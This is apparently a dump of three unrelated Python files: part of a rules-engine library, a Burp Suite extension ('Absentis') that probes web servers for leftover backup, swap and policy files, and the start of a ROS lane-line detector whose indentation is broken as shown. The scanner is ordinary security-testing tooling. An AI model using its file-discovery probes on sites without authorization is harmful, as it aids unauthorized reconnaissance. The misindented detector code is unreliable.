                    # Guard: the rule only fires while the chart is in this state.
                    state_test = {'chart_context': {'$and':[{'label': qualified_name}, {'chart': 1}]}}
                    if 'pri' in trigger:
                        rule['pri'] = trigger['pri']
                    if 'count' in trigger:
                        rule['count'] = trigger['count']
                    if 'cap' in trigger:
                        rule['cap'] = trigger['cap']
                    if 'all' in trigger:
                        rule['all'] = list(trigger['all'])
                        rule['all'].append(state_test)
                    elif 'any' in trigger:
                        rule['all'] = [state_test, {'m$any': trigger['any']}]
                    else:
                        rule['all'] = [state_test]
                    if 'run' in trigger:
                        # Accept an action name, a Promise, or a bare callable.
                        if isinstance(trigger['run'], str):
                            rule['run'] = Promise(self._host.get_action(trigger['run']))
                        elif isinstance(trigger['run'], Promise):
                            rule['run'] = trigger['run']
                        elif hasattr(trigger['run'], '__call__'):
                            rule['run'] = Promise(trigger['run'])
                    if 'to' in trigger:
                        from_state = None
                        if qualified_name in reflexive_states:
                            from_state = qualified_name
                        to_state = trigger['to']
                        assert_state = False
                        if to_state in reflexive_states:
                            assert_state = True
                        # Chain the state move after the action (if any).
                        if 'run' in rule:
                            rule['run'].continue_with(To(from_state, to_state, assert_state))
                        else:
                            rule['run'] = To(from_state, to_state, assert_state)
                        # A state that is a transition target cannot be a start state.
                        if to_state in start_state:
                            del start_state[to_state]
                        if parent_start_state and to_state in parent_start_state:
                            del parent_start_state[to_state]
                    else:
                        raise Exception('Trigger {0} destination not defined'.format(trigger_name))
                    rules[trigger_name] = rule;
        # Emit the $start rule that enters the chart's single start state.
        started = False
        for state_name in start_state.keys():
            if started:
                raise Exception('Chart {0} has more than one start state {1}'.format(self._name, state_name))
            started = True
            if parent_name:
                rules[parent_name + '$start'] = {'all':[{'chart_context': {'$and': [{'label': parent_name}, {'chart':1}]}}], 'run': To(None, state_name, False)};
            else:
                rules['$start'] = {'all': [{'chart_context': {'$and': [{'$nex': {'running': 1}}, {'$s': 1}]}}], 'run': To(None, state_name, False)};
        if not started:
            raise Exception('Chart {0} has no start state'.format(self._name))
class Flowchart(Ruleset):
    """A Ruleset whose rules are compiled from a flowchart definition.

    Each stage transition becomes a rule guarded by a 'chart_context' test
    on the current stage label; reaching a stage runs that stage's action
    (if any) after a To(...) continuation moves the chart forward.
    """
    def __init__(self, name, host, chart_definition, state_cache_size):
        self._name = name
        self._host = host
        ruleset_definition = {}
        # Compile the chart into a flat ruleset before initializing the base.
        self._transform(chart_definition, ruleset_definition)
        super(Flowchart, self).__init__(name, host, ruleset_definition, state_cache_size)
        self._definition = chart_definition
        self._definition['$type'] = 'flowChart'
    def _transform(self, chart_definition, rules):
        """Translate flowchart stages/transitions into rules.

        Stages never named as a transition target are start-state
        candidates; exactly one is allowed. Raises when a transition
        references an undefined stage or multiple start stages exist.
        """
        visited = {}
        reflexive_stages = {}
        # First pass: stages with a self-transition (or count/cap semantics)
        # must re-assert their stage when re-entered.
        for stage_name, stage in chart_definition.items():
            if 'to' in stage:
                if isinstance(stage['to'], str):
                    if stage['to'] == stage_name:
                        reflexive_stages[stage_name] = True
                else:
                    for transition_name, transition in stage['to'].items():
                        if transition_name == stage_name or 'count' in transition or 'cap' in transition:
                            reflexive_stages[stage_name] = True
        # Second pass: one rule per outgoing transition.
        for stage_name, stage in chart_definition.items():
            # Guard: the rule only fires while the chart is in this stage.
            stage_test = {'chart_context': {'$and':[{'label': stage_name}, {'chart':1}]}}
            from_stage = None
            if stage_name in reflexive_stages:
                from_stage = stage_name
            if 'to' in stage:
                if isinstance(stage['to'], str):
                    # Unconditional transition to a single next stage.
                    next_stage = None
                    rule = {'all': [stage_test]}
                    if stage['to'] in chart_definition:
                        next_stage = chart_definition[stage['to']]
                    else:
                        raise Exception('Stage {0} not found'.format(stage['to']))
                    assert_stage = False
                    if stage['to'] in reflexive_stages:
                        assert_stage = True
                    if not 'run' in next_stage:
                        rule['run'] = To(from_stage, stage['to'], assert_stage)
                    else:
                        # Move stage first, then run the destination's action.
                        if isinstance(next_stage['run'], str):
                            rule['run'] = To(from_stage, stage['to'], assert_stage).continue_with(Promise(self._host.get_action(next_stage['run'])))
                        elif isinstance(next_stage['run'], Promise) or hasattr(next_stage['run'], '__call__'):
                            rule['run'] = To(from_stage, stage['to'], assert_stage).continue_with(next_stage['run'])
                    rules['{0}.{1}'.format(stage_name, stage['to'])] = rule
                    visited[stage['to']] = True
                else:
                    # Conditional transitions: one rule per condition.
                    for transition_name, transition in stage['to'].items():
                        rule = {}
                        next_stage = None
                        if 'pri' in transition:
                            rule['pri'] = transition['pri']
                        if 'count' in transition:
                            rule['count'] = transition['count']
                        if 'cap' in transition:
                            rule['cap'] = transition['cap']
                        if 'all' in transition:
                            rule['all'] = list(transition['all'])
                            rule['all'].append(stage_test)
                        elif 'any' in transition:
                            rule['all'] = [stage_test, {'m$any': transition['any']}]
                        else:
                            rule['all'] = [stage_test]
                        if transition_name in chart_definition:
                            next_stage = chart_definition[transition_name]
                        else:
                            raise Exception('Stage {0} not found'.format(transition_name))
                        assert_stage = False
                        if transition_name in reflexive_stages:
                            assert_stage = True
                        if not 'run' in next_stage:
                            rule['run'] = To(from_stage, transition_name, assert_stage)
                        else:
                            if isinstance(next_stage['run'], str):
                                rule['run'] = To(from_stage, transition_name, assert_stage).continue_with(Promise(self._host.get_action(next_stage['run'])))
                            elif isinstance(next_stage['run'], Promise) or hasattr(next_stage['run'], '__call__'):
                                rule['run'] = To(from_stage, transition_name, assert_stage).continue_with(next_stage['run'])
                        rules['{0}.{1}'.format(stage_name, transition_name)] = rule
                        visited[transition_name] = True
        # Emit the $start rule that enters the chart's single start stage.
        started = False
        for stage_name, stage in chart_definition.items():
            if not stage_name in visited:
                if started:
                    raise Exception('Chart {0} has more than one start state'.format(self._name))
                rule = {'all': [{'chart_context': {'$and': [{'$nex': {'running': 1}}, {'$s': 1}]}}]}
                if not 'run' in stage:
                    rule['run'] = To(None, stage_name, False)
                else:
                    if isinstance(stage['run'], str):
                        rule['run'] = To(None, stage_name, False).continue_with(Promise(self._host.get_action(stage['run'])))
                    elif isinstance(stage['run'], Promise) or hasattr(stage['run'], '__call__'):
                        rule['run'] = To(None, stage_name, False).continue_with(stage['run'])
                rules['$start.{0}'.format(stage_name)] = rule
                started = True
class Host(object):
    """Registry and dispatcher for a set of rulesets.

    Holds the ruleset directory, forwards event/fact/state operations to the
    right ruleset, and runs background dispatch loops for actions and timers.
    Subclasses override get_action/load_ruleset/save_ruleset to supply actions
    and persistence.
    """
    def __init__(self, ruleset_definitions = None, databases = None, state_cache_size = 1024):
        if not databases:
            databases = [{'host': 'localhost', 'port': 6379, 'password': None, 'db': 0}]
        self._ruleset_directory = {}
        self._ruleset_list = []
        self._databases = databases
        self._state_cache_size = state_cache_size
        if ruleset_definitions:
            self.register_rulesets(None, ruleset_definitions)
    def get_action(self, action_name):
        """Resolve an action by name; subclasses override to supply actions."""
        raise Exception('Action with name {0} not found'.format(action_name))
    def load_ruleset(self, ruleset_name):
        """Load a ruleset definition on demand; subclasses override."""
        raise Exception('Ruleset with name {0} not found'.format(ruleset_name))
    def save_ruleset(self, ruleset_name, ruleset_definition):
        """Persist a ruleset definition; no-op by default."""
        return
    def get_ruleset(self, ruleset_name):
        """Return a registered ruleset, lazily loading and registering it."""
        if ruleset_name in self._ruleset_directory:
            return self._ruleset_directory[ruleset_name]
        else:
            ruleset_definition = self.load_ruleset(ruleset_name)
            self.register_rulesets(None, ruleset_definition)
            return self._ruleset_directory[ruleset_name]
    def set_ruleset(self, ruleset_name, ruleset_definition):
        """Register and persist a ruleset definition."""
        self.register_rulesets(None, ruleset_definition)
        self.save_ruleset(ruleset_name, ruleset_definition)
    def get_state(self, ruleset_name, sid):
        """Return the state for a session of the named ruleset."""
        return self.get_ruleset(ruleset_name).get_state(sid)
    def delete_state(self, ruleset_name, sid):
        """Delete the state for a session of the named ruleset."""
        self.get_ruleset(ruleset_name).delete_state(sid)
    def get_ruleset_state(self, ruleset_name, sid=None):
        # BUG FIX: 'sid' was referenced without ever being defined, so every
        # call raised NameError. It is now an explicit parameter defaulting
        # to None, which keeps existing one-argument callers working.
        # NOTE(review): assumes the ruleset exposes get_ruleset_state -- the
        # method is not visible in this file; confirm against the engine API.
        return self.get_ruleset(ruleset_name).get_ruleset_state(sid)
    def post_batch(self, ruleset_name, messages):
        """Post a batch of events to the named ruleset."""
        return self.get_ruleset(ruleset_name).assert_events(messages)
    def start_post_batch(self, ruleset_name, messages):
        return self.get_ruleset(ruleset_name).start_assert_events(messages)
    def post(self, ruleset_name, message):
        """Post a single event to the named ruleset."""
        return self.get_ruleset(ruleset_name).assert_event(message)
    def start_post(self, ruleset_name, message):
        return self.get_ruleset(ruleset_name).start_assert_event(message)
    def assert_fact(self, ruleset_name, fact):
        return self.get_ruleset(ruleset_name).assert_fact(fact)
    def start_assert_fact(self, ruleset_name, fact):
        return self.get_ruleset(ruleset_name).start_assert_fact(fact)
    def assert_facts(self, ruleset_name, facts):
        return self.get_ruleset(ruleset_name).assert_facts(facts)
    def start_assert_facts(self, ruleset_name, facts):
        return self.get_ruleset(ruleset_name).start_assert_facts(facts)
    def retract_fact(self, ruleset_name, fact):
        return self.get_ruleset(ruleset_name).retract_fact(fact)
    def start_retract_fact(self, ruleset_name, fact):
        return self.get_ruleset(ruleset_name).start_retract_fact(fact)
    def retract_facts(self, ruleset_name, facts):
        return self.get_ruleset(ruleset_name).retract_facts(facts)
    def start_retract_facts(self, ruleset_name, facts):
        return self.get_ruleset(ruleset_name).start_retract_facts(facts)
    def patch_state(self, ruleset_name, state):
        """Assert (patch) session state on the named ruleset."""
        return self.get_ruleset(ruleset_name).assert_state(state)
    def renew_action_lease(self, ruleset_name, sid):
        self.get_ruleset(ruleset_name).renew_action_lease(sid)
    def register_rulesets(self, parent_name, ruleset_definitions):
        """Create, register and bind rulesets; returns the new names.

        Raises if any name is already registered.
        """
        rulesets = Ruleset.create_rulesets(parent_name, self, ruleset_definitions, self._state_cache_size)
        for ruleset_name, ruleset in rulesets.items():
            if ruleset_name in self._ruleset_directory:
                raise Exception('Ruleset with name {0} already registered'.format(ruleset_name))
            else:
                self._ruleset_directory[ruleset_name] = ruleset
                self._ruleset_list.append(ruleset)
                ruleset.bind(self._databases)
        return list(rulesets.keys())
    def run(self):
        """Start the background action- and timer-dispatch loops.

        Each loop round-robins over the registered rulesets on daemon
        threads; a Timer (0.25s) is used to back off when a full pass found
        no work, otherwise dispatch continues immediately on a new thread.
        """
        def dispatch_ruleset(index, wait):
            def callback(e, w):
                inner_wait = wait
                if e:
                    # '306' appears to be a transient engine code that is safe
                    # to ignore; anything else is fatal for the process.
                    if str(e).find('306') == -1:
                        print('Exiting {0}'.format(str(e)))
                        os._exit(1)
                elif not w:
                    inner_wait = False
                if (index == (len(self._ruleset_list) -1)) and inner_wait:
                    # Full pass with no work: back off briefly.
                    self._d_timer = threading.Timer(0.25, dispatch_ruleset, ((index + 1) % len(self._ruleset_list), inner_wait, ))
                    self._d_timer.daemon = True
                    self._d_timer.start()
                else:
                    self._d_timer = threading.Thread(target = dispatch_ruleset, args = ((index + 1) % len(self._ruleset_list), inner_wait, ))
                    self._d_timer.daemon = True
                    self._d_timer.start()
            if not self._ruleset_list:
                # No rulesets yet: poll again later.
                self._d_timer = threading.Timer(0.5, dispatch_ruleset, (0, False, ))
                self._d_timer.daemon = True
                self._d_timer.start()
            else:
                ruleset = self._ruleset_list[index]
                if not index:
                    # Reset the wait flag at the start of each full pass.
                    wait = True
                ruleset.dispatch(callback)
        def dispatch_timers(index, wait):
            def callback(e, w):
                inner_wait = wait
                if e:
                    print('Error {0}'.format(str(e)))
                elif not w:
                    inner_wait = False
                if (index == (len(self._ruleset_list) -1)) and inner_wait:
                    self._t_timer = threading.Timer(0.25, dispatch_timers, ((index + 1) % len(self._ruleset_list), inner_wait, ))
                    self._t_timer.daemon = True
                    self._t_timer.start()
                else:
                    self._t_timer = threading.Thread(target = dispatch_timers, args = ((index + 1) % len(self._ruleset_list), inner_wait, ))
                    self._t_timer.daemon = True
                    self._t_timer.start()
            if not self._ruleset_list:
                self._t_timer = threading.Timer(0.5, dispatch_timers, (0, False, ))
                self._t_timer.daemon = True
                self._t_timer.start()
            else:
                ruleset = self._ruleset_list[index]
                if not index:
                    wait = True
                ruleset.dispatch_timers(callback)
        self._d_timer = threading.Timer(0.1, dispatch_ruleset, (0, False, ))
        self._d_timer.daemon = True
        self._d_timer.start()
        self._t_timer = threading.Timer(0.1, dispatch_timers, (0, False, ))
        self._t_timer.daemon = True
        self._t_timer.start()
class Queue(object):
    """Standalone client for queueing events/facts into a single ruleset.

    Owns an engine client handle bound to one Redis database; close() must
    be called to release the handle.
    """
    def __init__(self, ruleset_name, database = None, state_cache_size = 1024):
        if not database:
            database = {'host': 'localhost', 'port': 6379, 'password':None, 'db': 0}
        self._ruleset_name = ruleset_name
        self._handle = rules.create_client(state_cache_size, ruleset_name)
        if isinstance(database, str):
            # A bare string is treated as a connection string.
            rules.bind_ruleset(0, 0, database, None, self._handle)
        else:
            database.setdefault('password', None)
            database.setdefault('db', 0)
            rules.bind_ruleset(database['port'], database['db'], database['host'], database['password'], self._handle)
    def isClosed(self):
        """True once close() has released the engine handle."""
        return self._handle == 0
    def _enqueue(self, queue_op, message):
        # Shared guard + sid extraction for post/assert_fact/retract_fact.
        if self._handle == 0:
            raise Exception('Queue has already been closed')
        sid = str(message['sid']) if 'sid' in message else None
        queue_op(self._handle, sid, self._ruleset_name, json.dumps(message, ensure_ascii=False))
    def post(self, message):
        """Queue an event for the bound ruleset."""
        self._enqueue(rules.queue_assert_event, message)
    def assert_fact(self, message):
        """Queue a fact assertion for the bound ruleset."""
        self._enqueue(rules.queue_assert_fact, message)
    def retract_fact(self, message):
        """Queue a fact retraction for the bound ruleset."""
        self._enqueue(rules.queue_retract_fact, message)
    def close(self):
        """Release the engine client handle; safe to call twice."""
        if self._handle != 0:
            rules.delete_client(self._handle)
            self._handle = 0
|
absentis.py | import os.path
from burp import IBurpExtender, IIntruderPayloadGeneratorFactory, IIntruderPayloadGenerator, IScannerCheck, IScanIssue, IScannerInsertionPointProvider, IContextMenuFactory, IContextMenuInvocation, IScannerInsertionPoint, IScanIssue, IExtensionStateListener
import json
from java.io import PrintWriter
from javax.swing import JMenuItem
from java.util import List,ArrayList
import datetime
import threading
# Per-user config file written to the home directory on first run.
CONFIG_FILENAME = '.absentis.conf'
EXTENSION_NAME = 'Absentis'
INSERTION_POINT_NAME = 'Absentis URL insertion point'
GENERATOR_NAME = 'Absentis URL Generator Factory'
# Default configuration; overridden by ~/.absentis.conf when present.
config_defaults = {
    # Suffixes appended to the request's file path (backup/editor leftovers).
    'file_append_values' : [
        '.bak',
        '.bkp',
        '.backup',
        '.old',
        '.src',
        '.data',
        '.dev',
        '.inc',
        '.orig',
        '.original',
        '.copy',
        '.tmp',
        '.swp',
        '~'
    ],
    # Well-known files probed only at the web root.
    'rootdir_values' : [
        'robots.txt',
        'humans.txt',
        'security.txt',
        'sitemap.xml'
    ],
    # Policy files probed in the request's directory.
    'dir_values' : [
        'crossdomain.xml',
        'clientaccesspolicy.xml'
    ],
    'scanner_check' : True,
    'global_active_scan' : False, # for various reasons based on how the scanner is tuned this often isn't effective, disable until fixed
    'intruder_payload_generator' : True,
    'context_menu_active_scan' : True
}
# TODO
# zip, bz2, gz, tar, tar.bz2, tar.gz, .tgz, .rar
# git repo files
# windows copy
# directories with
# 8.3 filenames? including for filter bypassing
# replacing extensions too? .java, .inc, .config, .asa, and many of the above list
# 200 is a legit hit
# 403 is worth a closer check
class Parser:
    """Generates candidate interesting-file URLs derived from a request URL.

    Every method named parser_* takes a URL path (query string allowed) and
    returns a list of candidate paths; get_parser_output aggregates them.
    """
    def __init__(self, config):
        self.config = config
    def _split_path(self, url):
        # Split the query-less path into [directory, filename] at the last '/'.
        path = url.split('?')[0]
        if '/' not in path:
            # Mirrors the original behavior for slash-less input.
            return [path]
        head, _, tail = path.rpartition('/')
        return [head, tail]
    def parser_file_append(self, url):
        """Append backup-style suffixes (.bak, .old, ~, ...) to the file path."""
        if url.endswith('/'):
            return []
        base = url.split('?')[0]
        return [base + suffix for suffix in self.config['file_append_values']]
    def parser_vim_swp(self, url):
        """Build the vim swap-file variant: /dir/.file.swp."""
        if url.endswith('/'):
            return []
        directory, filename = self._split_path(url)
        return ['{}/.{}.swp'.format(directory, filename)]
    def parser_rootdir(self, url):
        """Probe well-known root files, but only for root-level requests."""
        if url.count('/') != 1:
            return []
        return ['/{}'.format(name) for name in self.config['rootdir_values']]
    def parser_dir(self, url):
        """Probe policy files in the request's directory."""
        directory = self._split_path(url)[0]
        return ['{}/{}'.format(directory, name) for name in self.config['dir_values']]
    def get_parser_output(self, url):
        """Run every parser_* method (alphabetical order) and concatenate."""
        results = []
        for method_name in [name for name in dir(self) if name.startswith('parser_')]:
            results.extend(getattr(self, method_name)(url))
        return results
class BurpExtender(IBurpExtender):
    '''BurpExtender Class to register the extension with Burp Suite'''
    def registerExtenderCallbacks(self, callbacks):
        '''Load (or create) the config file, then register the configured
        Burp components: payload generator, insertion points, context menu
        and scanner check.'''
        config_file = os.path.join(os.path.expanduser("~"), CONFIG_FILENAME)
        stdout = PrintWriter(callbacks.getStdout(), True)
        stderr = PrintWriter(callbacks.getStderr(), True)
        continue_load = True
        if not os.path.isfile(config_file):
            # First run: persist the defaults so users can edit them later.
            # (with-statement fixes the previously unclosed file handle)
            with open(config_file, 'w') as f:
                f.write(json.dumps(config_defaults, indent=4, sort_keys=True))
            stdout.println('Existing config file not found. Wrote default config file values to ~/{}'.format(CONFIG_FILENAME))
            config = config_defaults
        else:
            try:
                with open(config_file) as f:
                    config = json.load(f)
                stdout.println('Loaded configuration from: ~/{}'.format(CONFIG_FILENAME))
            except Exception as e:
                stderr.println('An error occuring reading the config file ~/{}: {}.\nTerminating extension.'.format(CONFIG_FILENAME, e))
                # BUG FIX: this was misspelled 'contine_load', so config read
                # errors were silently ignored and the extension loaded anyway.
                continue_load = False
        if continue_load:
            callbacks.setExtensionName(EXTENSION_NAME)
            if config['intruder_payload_generator']:
                callbacks.registerIntruderPayloadGeneratorFactory(PayloadGeneratorFactory(callbacks, config))
                stdout.println('Intruder payload generator registered')
            if config['global_active_scan']:
                callbacks.registerScannerInsertionPointProvider(InsertionPointProvider(callbacks, config))
                stdout.println('Checks now registered to be performed as part of a regular Active Scan')
                # Active scanning requires the scanner check to be on.
                config['scanner_check'] = True
            if config['context_menu_active_scan']:
                callbacks.registerContextMenuFactory(ContextMenu(callbacks, config))
                stdout.println('Context menu to actively scan selected request registered')
                config['scanner_check'] = True
            if config['scanner_check']:
                callbacks.registerScannerCheck(Scanner(callbacks, config))
                stdout.println('Scanner check registered')
            stdout.println('Extension loaded!')
class ContextMenu(IContextMenuFactory):
    """Adds a right-click menu entry that actively scans the selected
    request(s) with this extension's checks on a background thread."""
    def __init__(self, callbacks, config):
        self.callbacks = callbacks
        self.config = config
        self.helpers = callbacks.getHelpers()
    def createMenuItems(self, IContextMenuInvocation):
        """Return the menu entry; remembers the selected messages for onClick."""
        self.selectedMessages = IContextMenuInvocation.getSelectedMessages()
        menuItemList = ArrayList()
        menuItemList.add(JMenuItem("Actively scan request with Absentis", actionPerformed = self.onClick))
        return menuItemList
    def runScan(self):
        """Scan each selected message and add any new issues to Burp."""
        stderr = PrintWriter(self.callbacks.getStderr(), True)
        for message in self.selectedMessages:
            request = message.getRequest()
            http_service = message.getHttpService()
            a_request = self.helpers.analyzeRequest(http_service, request)
            # Keep only the path portion of the URL (strip scheme://host).
            url = '/' + str(a_request.getUrl()).split('/', 3)[-1]
            insertion_point = InsertionPoint(self.callbacks, self.config, request, url)
            if insertion_point.checkValid():
                for scanner in self.callbacks.getScannerChecks():
                    issues = scanner.doActiveScan(message, insertion_point)
                    for issue in issues:
                        url = str(issue.getUrl())
                        url = '{}/{}/{}'.format('/'.join(url.split('/')[:2]), url.split('/')[2].split(':')[0], url.split('/', 3)[-1]) # no port in hostname
                        exists = False
                        # Deduplicate against issues Burp already knows about.
                        for existing_issue in self.callbacks.getScanIssues(url):
                            if existing_issue.getIssueName() == issue.getIssueName():
                                exists = True
                        if not exists:
                            self.callbacks.addScanIssue(issue)
        stderr.println('Finished scan')
    def onClick(self, event):
        # Run off the Swing event thread so the UI stays responsive.
        t = threading.Thread(target=self.runScan)
        t.daemon = True
        t.start()
class StateLoader(IExtensionStateListener):
    """Extension state listener; currently a no-op placeholder."""
    def __init__(self, callbacks, config):
        self.config = config
        self.callbacks = callbacks
    def extensionUnloaded(self):
        # Nothing to clean up yet.
        pass
class Scanner(IScannerCheck):
    """Active scanner check that probes Parser-generated candidate URLs and
    raises an issue for every 200 response."""
    def __init__(self, callbacks, config):
        self.callbacks = callbacks
        self.helpers = callbacks.getHelpers()
        self.config = config
    def doPassiveScan(self, baseRequestResponse):
        # return None or a list of IScanIssue objects
        return None
    def doActiveScan(self, baseRequestResponse, insertionPoint):
        # This implements the scan, including making a request/s, receiving the responses,
        # creating scan issues for relevant issues and returning them or None
        # is called for each active scan, for each insertion point - filter for
        stderr = PrintWriter(self.callbacks.getStderr(), True)
        stdout = PrintWriter(self.callbacks.getStdout(), True)
        out = None
        # filter for the insertion points we care about:
        # our own named point, or Burp's URL path filename/folder (37/33)
        if insertionPoint.getInsertionPointName() == INSERTION_POINT_NAME or insertionPoint.getInsertionPointType() in [33, 37]:
            #stderr.println('Enabled insertion point {}'.format(insertionPoint.getInsertionPointName()))
            http_service = baseRequestResponse.getHttpService()
            host = http_service.getHost()
            port = http_service.getPort()
            useHttps = http_service.getProtocol() == 'https'
            parser = Parser(self.config)
            payloads = parser.get_parser_output(insertionPoint.getBaseValue())
            for payload in payloads:
                # Issue one request per candidate URL; flag any 200 response.
                request = insertionPoint.buildRequest(self.helpers.stringToBytes(payload))
                requestResponse = self.callbacks.makeHttpRequest(http_service, request)
                response = requestResponse.getResponse()
                analysed_response = self.helpers.analyzeResponse(response)
                if analysed_response.getStatusCode() == 200:
                    scanIssue = ScanIssue(self.callbacks, self.config, requestResponse, payload)
                    if not out:
                        out = []
                    out.append(scanIssue)
                #stderr.println('Finished for: {}'.format(payload))
        return out
    def consolidateDuplicateIssues(self, existingIssue, newIssue): # typeIScanIssue
        # Same issue name: keep only the existing issue.
        if existingIssue.getIssueName() == newIssue.getIssueName():
            return -1
        else:
            return 0 # 0 for both issues, -1 for existing only, 1 for the new issue only
class InsertionPoint(IScannerInsertionPoint):
    """Insertion point covering the URL path portion of a raw request, so
    payloads replace the whole path rather than a single parameter."""
    def __init__(self, callbacks, config, request, url):
        self.callbacks = callbacks
        self.helpers = callbacks.getHelpers()
        self.request = self.helpers.bytesToString(request)
        self.url = url
        # Character span of the URL within the raw request text.
        self.start = self.request.find(url)
        self.end = self.start+len(url)
        # NOTE(review): the original comment said "disable by default so this
        # is used only for this extensions Scanner" but the code enables it;
        # confirm the intended default.
        self.enabled = True
        self.stderr = PrintWriter(self.callbacks.getStderr(), True)
    def enable(self):
        self.enabled = True
    def disable(self):
        self.enabled = False
    def checkValid(self):
        # start > 0 means the URL was found (and not at offset 0, which
        # would be before the HTTP method).
        return self.start > 0
    def buildRequest(self, payload):
        """Return the raw request with the URL span replaced by payload."""
        #self.stderr.println('buildRequest called')
        #if self.enabled:
        p = self.request[:self.start] + self.helpers.bytesToString(payload) + self.request[self.end:]
        return self.helpers.stringToBytes(p)
        #else:
        #return None
    def getBaseValue(self):
        #self.stderr.println('getBaseValue called')
        #if self.enabled:
        return self.url
        #else:
        #    return None
    def getInsertionPointName(self):
        #self.stderr.println('getInsertionPointName called')
        return INSERTION_POINT_NAME
    def getInsertionPointType(self):
        #self.stderr.println('getInsertionPointType called')
        # NOTE(review): 0x65 (101) matches neither documented constant below;
        # confirm against the Burp API.
        return '\x65' #INS_URL_PATH_FILENAME 37 or INS_URL_PATH_FOLDER 33
    def getPayloadOffsets(self, payload):
        #self.stderr.println('getPayloadOffsets called')
        return [self.start, self.start+len(payload)] if (self.checkValid() and self.enabled) else None
#TODO
# try and find a way to only have these registered insertion points used for this extensions scans
# at the moment if this insertion point provider is registered it is used for all payloads
# the scan tuning will quickly stop sending to this unless custom settings are used
# this makes the integration into regular scan workflow unusable
class InsertionPointProvider(IScannerInsertionPointProvider):
    """Registers the URL-path insertion point for regular active scans
    (only when 'global_active_scan' is enabled in the config)."""
    def __init__(self, callbacks, config):
        self.callbacks = callbacks
        self.config = config
        self.helpers = callbacks.getHelpers()
    def getInsertionPoints(self, baseRequestResponse):
        """Return a single URL-path insertion point for the request, or None."""
        raw_request = baseRequestResponse.getRequest()
        http_service = baseRequestResponse.getHttpService()
        a_request = self.helpers.analyzeRequest(http_service, raw_request)
        url = '/' + str(a_request.getUrl()).split('/', 3)[-1] # the file path portion of url, e.g. /robots.txt
        insertion_points = None
        if url: # there should always be a url, but lets check
            ip = InsertionPoint(self.callbacks, self.config, raw_request, url)
            if ip.checkValid():
                insertion_points = [ip]
        return insertion_points
        #stderr = PrintWriter(self.callbacks.getStderr(), True)
        #stderr.println('Not implemented')
        #TODO
        # create an InsertionPoint that identifies the url in a request
        # the right click option will need to duplicate this
        #return None
class ScanIssue(IScanIssue):
    """Informational issue reported when a candidate file URL returns 200."""
    def __init__(self, callbacks, config, requestResponse, payload):
        self.callbacks = callbacks
        self.stderr = PrintWriter(self.callbacks.getStderr(), True)
        self.payload = payload
        self.config = config
        self.requestResponse = requestResponse
        self.http_service = requestResponse.getHttpService()
        # Derive the issue URL from the request that found the file.
        analyzed = self.callbacks.getHelpers().analyzeRequest(self.http_service, requestResponse.getRequest())
        self.url1 = analyzed.getUrl()
    def getUrl(self):
        return self.url1
    def getIssueName(self):
        return 'File discovered: {}'.format(self.payload)
    def getIssueType(self):
        return 0x006000d8 # https://portswigger.net/kb/issues
    def getIssueDetail(self):
        return 'No additional detail.'
    def getRemediationDetail(self):
        return 'Check if the file can be removed.'
    def getSeverity(self):
        return 'Information' # "High", "Medium", "Low", "Information" or "False positive".
    def getConfidence(self):
        return 'Certain' # Firm, Tentative
    def getIssueBackground(self):
        return 'Found a file: {}'.format(self.payload)
    def getRemediationBackground(self):
        return 'File is potentially an interesting one, have a look at it.'
    def getHttpMessages(self):
        return [self.requestResponse]
    def getHttpService(self):
        return self.http_service
class PayloadGeneratorFactory(IIntruderPayloadGeneratorFactory):
    """Registers the extension's Intruder payload generator with Burp."""

    def __init__(self, callbacks, config):
        self.callbacks = callbacks
        self.config = config

    def getGeneratorName(self):
        # Name shown in the Intruder payload-type drop-down.
        return GENERATOR_NAME

    def createNewInstance(self, attack):
        # One generator instance per Intruder attack.
        return PayloadGenerator(self.callbacks, self.config, attack)
class PayloadGenerator(IIntruderPayloadGenerator):
    """Intruder payload generator fed by the parser's output for the base value."""

    def __init__(self, callbacks, config, attack):
        self.callbacks = callbacks
        self.config = config
        self.helpers = callbacks.getHelpers()
        self.parser = Parser(config)
        # Lazily initialised on the first getNextPayload() call.
        self.payloads = None
        self.morePayloads = True

    def hasMorePayloads(self):
        return self.morePayloads

    def getNextPayload(self, baseValue):
        if self.payloads is None:  # first run: derive payloads from the base value
            self.payloads = self.parser.get_parser_output(self.helpers.bytesToString(baseValue))
        if len(self.payloads):
            payload = self.payloads.pop(0)
            if len(self.payloads) == 0:
                self.morePayloads = False
            return payload
        else:  # should be unreachable: hasMorePayloads() gates calls into here
            # Fixed: was self.config.strerr.println(...), a typo'd attribute that
            # would itself raise; log to Burp's stderr like ScanIssue does.
            PrintWriter(self.callbacks.getStderr(), True).println(
                'An error occured when generating payloads!')
|
line_detector_node_yellow_blue.py | #!/usr/bin/env python
from anti_instagram.AntiInstagram import *
from cv_bridge import CvBridge, CvBridgeError
from duckietown_msgs.msg import (AntiInstagramTransform, BoolStamped, Segment,
SegmentList, Vector2D)
from duckietown_utils.instantiate_utils import instantiate
from duckietown_utils.jpg import image_cv_from_jpg
from geometry_msgs.msg import Point
from sensor_msgs.msg import CompressedImage, Image
from visualization_msgs.msg import Marker
from line_detector.line_detector_plot import *
from line_detector.timekeeper import TimeKeeper
import cv2
import numpy as np
import rospy
import threading
import time
class LineDetectorNode(object):
def __init__(self):
    """Wire up the node: state, detector instantiation, publishers, subscribers."""
    self.node_name = "LineDetectorNode"
    # Thread lock: only one frame is processed at a time (see processImage).
    self.thread_lock = threading.Lock()
    # Constructor of line detector
    self.bridge = CvBridge()
    self.active = True
    self.stats = Stats()
    # Only log the intermittent summary every intermittent_interval cycles.
    self.intermittent_interval = 100
    self.intermittent_counter = 0
    # color correction
    self.ai = AntiInstagram()
    # these will be added if it becomes verbose
    self.pub_edge = None
    self.pub_colorSegment = None
    self.detector = None
    self.verbose = None
    # Synchronous first read so detector/params exist before the first image.
    self.updateParams(None)
    # Publishers
    self.pub_lines = rospy.Publisher("~segment_list", SegmentList, queue_size=1)
    self.pub_image = rospy.Publisher("~image_with_lines", Image, queue_size=1)
    # Subscribers
    self.sub_image = rospy.Subscriber("~image", CompressedImage, self.cbImage, queue_size=1)
    self.sub_transform = rospy.Subscriber("~transform", AntiInstagramTransform, self.cbTransform, queue_size=1)
    self.sub_switch = rospy.Subscriber("~switch", BoolStamped, self.cbSwitch, queue_size=1)
    rospy.loginfo("[%s] Initialized (verbose = %s)." %(self.node_name, self.verbose))
    # Re-read parameters every 2 seconds.
    rospy.Timer(rospy.Duration.from_sec(2.0), self.updateParams)
def updateParams(self, _event):
    """Periodic parameter refresh (also called once from the constructor)."""
    previous_verbose = self.verbose
    self.verbose = rospy.get_param('~verbose', True)
    if self.verbose != previous_verbose:
        self.loginfo('Verbose is now %r' % self.verbose)
    self.image_size = rospy.get_param('~img_size')
